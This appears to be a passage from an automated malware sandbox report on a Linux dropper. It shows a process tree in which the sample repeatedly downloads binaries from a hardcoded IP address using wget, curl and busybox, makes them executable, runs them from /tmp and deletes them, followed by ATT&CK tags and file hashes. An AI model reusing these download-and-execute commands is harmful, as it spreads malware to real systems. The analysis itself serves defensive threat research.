- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:1637
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:1640
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:1643
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:1646
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:1647
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:1649
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:1652
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:1655
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:1658
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:1659
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:1661
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:1664
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:1665
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:1667
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:1669
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:1670
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97